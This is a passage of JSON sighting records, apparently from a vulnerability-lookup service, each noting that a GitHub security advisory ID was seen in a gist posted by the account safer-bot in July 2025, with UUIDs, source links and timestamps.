"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "7fe7b225-a4b6-43b5-9c37-c0d56ad47b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "eb762730-be17-4cd7-8c5d-432d02982f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/cbf9763698c1084d9a1362107ee414bf", "content": "", "creation_timestamp": "2025-07-16T18:48:25.000000Z"}, {"uuid": "4e0d2497-488e-4558-96df-507485344820", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/cbf9763698c1084d9a1362107ee414bf", "content": "", "creation_timestamp": "2025-07-16T18:48:25.000000Z"}, {"uuid": "64dbba81-d25a-42f1-93ff-e2faf292fecd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/cbf9763698c1084d9a1362107ee414bf", "content": "", "creation_timestamp": "2025-07-16T18:48:25.000000Z"}, {"uuid": "e527808c-837e-4931-9a98-3a0c0b29b75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/cbf9763698c1084d9a1362107ee414bf", "content": "", "creation_timestamp": "2025-07-16T18:48:25.000000Z"}, {"uuid": "3502f6bb-6808-44d6-ae42-4725e0b92212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/cbf9763698c1084d9a1362107ee414bf", "content": "", "creation_timestamp": "2025-07-16T18:48:25.000000Z"}, {"uuid": "349cdfdd-1f35-4482-84fd-1a7b8f7cf122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "a36f11d0-cba6-49e0-9727-fd41df4f3fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "f65a75ad-6a50-4110-be7e-2de2e6db3ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "14c54e0a-32d3-414f-ac14-45e5f6efc006", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "3e260689-da1a-4801-b2d5-dc41b7063863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "f7ba9736-edbc-4994-b775-deef7b44bbaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/8ed05130467f95580e1467e34dd27249", "content": "", "creation_timestamp": "2025-07-16T18:49:32.000000Z"}, {"uuid": "6d74113d-c18b-49e7-8297-4d437253e0ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7e42e272379c198940f59cdbb4464456", "content": "", "creation_timestamp": "2025-07-16T18:56:48.000000Z"}, {"uuid": "4cfc5d10-365e-4cff-b9bb-782e6ef64713", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/969013266dfba6af737484ae86606892", "content": "", "creation_timestamp": "2025-07-16T18:58:29.000000Z"}, {"uuid": "330c3d5c-fe05-420b-8ba4-48390ca238b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/969013266dfba6af737484ae86606892", "content": "", "creation_timestamp": "2025-07-16T18:58:29.000000Z"}, {"uuid": "c5f9c00b-99d3-4437-b176-4200e9822919", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/969013266dfba6af737484ae86606892", "content": "", "creation_timestamp": "2025-07-16T18:58:29.000000Z"}, {"uuid": "35133b1a-1878-4449-9bbc-ef43843abbe8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/969013266dfba6af737484ae86606892", "content": "", "creation_timestamp": "2025-07-16T18:58:29.000000Z"}, {"uuid": "c1808916-4428-4826-9353-80f5848ab3b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/a2afbfbe4d7c899c99feb8c00f281456", "content": "", "creation_timestamp": "2025-07-16T19:02:07.000000Z"}, {"uuid": "9deaba32-d104-466a-9bb1-9437c2133cb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a2afbfbe4d7c899c99feb8c00f281456", "content": "", "creation_timestamp": "2025-07-16T19:02:07.000000Z"}, {"uuid": "a750aeec-db12-4171-a8a5-4dba9305435d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rcjj-h6gh-jf3r", "type": "seen", "source": "https://gist.github.com/safer-bot/a2afbfbe4d7c899c99feb8c00f281456", "content": "", "creation_timestamp": "2025-07-16T19:02:07.000000Z"}, {"uuid": "830faf0e-8e09-40c3-9e6e-64bfbcfdfb5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/f78c4a367dd67e4f122ce2bbd8ea471e", "content": "", "creation_timestamp": "2025-07-16T19:07:31.000000Z"}, {"uuid": "a99f94dc-f039-4172-8439-badd751c86bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/ed1545dd4adfd85ce7eb9a57fe91040b", "content": "", "creation_timestamp": "2025-07-16T19:08:44.000000Z"}, {"uuid": "b3a7cc5c-40e4-41bd-92e9-023bffe7cc71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/4fb5862ba1ec4ec2c7bac8e83497cb5e", "content": "", "creation_timestamp": "2025-07-16T19:14:07.000000Z"}, {"uuid": "ce4ddcb9-0f99-4f06-bbef-1ca430cfe3de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/4fb5862ba1ec4ec2c7bac8e83497cb5e", "content": "", "creation_timestamp": "2025-07-16T19:14:07.000000Z"}, {"uuid": "0d28636a-ac93-4bdd-b4fc-8daba217ee38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/4fb5862ba1ec4ec2c7bac8e83497cb5e", "content": "", "creation_timestamp": "2025-07-16T19:14:07.000000Z"}, {"uuid": "90fca3ac-ca24-429b-a6b6-7ad26ce86e8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "816d6b86-56fc-4cca-8ef5-cfd095eb619a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "810e2ea9-e0ff-41cf-b736-881822679ce4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "e958764d-51b1-45fc-a6c2-2f21738c2f79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "89106535-062e-4acd-889f-61add61e7d1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "62f1c1c5-35ea-4fd2-8d24-c94e962b5104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "6c3534e6-4ac0-4f02-92ea-0e288702c158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "dd46186c-2fdf-4cb2-97be-122c49a5cf34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "a415bd40-d4d3-412e-a834-b0b50fc20939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/5a627ec3984ccfec14c8e7006ea8e48b", "content": "", "creation_timestamp": "2025-07-16T19:23:27.000000Z"}, {"uuid": "0564071d-ca8f-4a14-bd61-22687441c69c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/4e9cb37876abae0789ce89fa7f99a8e3", "content": "", "creation_timestamp": "2025-07-16T19:22:55.000000Z"}, {"uuid": "27f3af5e-649a-40f4-998d-458bf3116caf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/4e9cb37876abae0789ce89fa7f99a8e3", "content": "", "creation_timestamp": "2025-07-16T19:22:55.000000Z"}, {"uuid": "ace327b9-5ccd-4c8b-a91b-0fcb0f3dd5df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/1f7aabccd2d68b4dd7c9512b45765f1a", "content": "", "creation_timestamp": "2025-07-16T19:25:07.000000Z"}, {"uuid": "2616269b-e533-4707-a0a8-824c1d769526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "1b1f3b4d-fd70-465b-a1d3-2e8018c0b760", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "2ebaf767-d91c-40f7-8f2c-2f66abb096f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "e32a05ba-1225-46a0-900c-223556ea6766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "f86025c5-339d-43dc-9591-7e9112a0e049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "454086fc-1b1a-4c86-8554-933d80494938", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "ea681c14-dc4f-4018-8d5b-ce6996d81ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "2c56f74e-e288-4c7e-b29a-39458d6fe504", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "66c2a95d-c465-4c22-a3c5-33a61fe8d2d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/d8d43252763cfccd8084971c15628730", "content": "", "creation_timestamp": "2025-07-16T19:34:19.000000Z"}, {"uuid": "4566ceba-c870-4db0-a836-4603fa0845f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/b42a8c7211ac57c39a5ce58c20427544", "content": "", "creation_timestamp": "2025-07-16T19:44:20.000000Z"}, {"uuid": "ab37306c-a251-402a-be1a-68d5e8c05c13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/b42a8c7211ac57c39a5ce58c20427544", "content": "", "creation_timestamp": "2025-07-16T19:44:20.000000Z"}, {"uuid": "b5870c5b-be98-41a2-ae5b-f1cc28b19a1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qg25-hgjv-cg9q", "type": "seen", "source": "https://gist.github.com/safer-bot/b42a8c7211ac57c39a5ce58c20427544", "content": "", "creation_timestamp": "2025-07-16T19:44:20.000000Z"}, {"uuid": "ea52a176-fb96-472d-9dd5-bb28dd4c0dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xphj-m9cc-8fmq", "type": "seen", "source": "https://gist.github.com/safer-bot/b42a8c7211ac57c39a5ce58c20427544", "content": "", "creation_timestamp": "2025-07-16T19:44:20.000000Z"}, {"uuid": "279bc3e8-171e-4597-bf2f-88668433dce1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "c7630527-b590-4a3b-866b-f2de17472883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "caf95b8e-3c35-496e-952d-166ec7694eef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "025ad142-7fc4-460a-b52c-5ffcba40024a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "bacebcc5-93a8-4a40-aa97-a5c2ae6cd9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8vhq-qq4p-grq3", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "5c1bc2ce-3961-4405-a529-c5fab01e8477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "ab0fc4c2-61d0-4f79-a0be-ef2500e8a34b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f88-5hg8-9x2x", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "84b3e786-8ea2-438f-a58d-482573255478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "0ac40ad6-aed0-44df-8738-f31cd58df39a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/996841c62c143ab19e1b79743b19601d", "content": "", "creation_timestamp": "2025-07-16T19:53:36.000000Z"}, {"uuid": "c2cd61e9-9200-43df-beef-50b3a25553c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/b7732f8c67177e6e56a56d928b5bbf45", "content": "", "creation_timestamp": "2025-07-16T19:56:51.000000Z"}, {"uuid": "99a036a1-13bd-4f97-bdaa-8535cf14d9b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/b7732f8c67177e6e56a56d928b5bbf45", "content": "", "creation_timestamp": "2025-07-16T19:56:51.000000Z"}, {"uuid": "0cbaa881-a62e-470f-a3b0-face3ecb00b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/b7732f8c67177e6e56a56d928b5bbf45", "content": "", "creation_timestamp": "2025-07-16T19:56:51.000000Z"}, {"uuid": "7ca69335-45c2-48a0-8f2e-57f7e74269cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/b7732f8c67177e6e56a56d928b5bbf45", "content": "", "creation_timestamp": "2025-07-16T19:56:51.000000Z"}, {"uuid": "7f119ba1-0a87-4373-be42-dbcc160a43d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/b7732f8c67177e6e56a56d928b5bbf45", "content": "", "creation_timestamp": "2025-07-16T19:56:51.000000Z"}, {"uuid": "9a940347-9db8-47b9-b872-cbfe0fc830dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/7bcb95f3b608e4b99a7de89141321603", "content": "", "creation_timestamp": "2025-07-16T20:00:37.000000Z"}, {"uuid": "54bea259-962d-4ebb-aff8-75e5453c3fc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/7bcb95f3b608e4b99a7de89141321603", "content": "", "creation_timestamp": "2025-07-16T20:00:37.000000Z"}, {"uuid": "46f10a9a-ff16-4ec7-a758-dd13071219bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/7bcb95f3b608e4b99a7de89141321603", "content": "", "creation_timestamp": "2025-07-16T20:00:37.000000Z"}, {"uuid": "9acb4613-d6ed-4d22-8bb3-aac7d4d1a3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf71be0f50720e248267b8d040d6660", "content": "", "creation_timestamp": "2025-07-16T20:07:49.000000Z"}, {"uuid": "24a3e263-b308-4358-934d-a408e2c4474e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/ecf71be0f50720e248267b8d040d6660", "content": "", "creation_timestamp": "2025-07-16T20:07:49.000000Z"}, {"uuid": "3f86222f-4bff-4e4c-b8f3-576e7755c9af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": 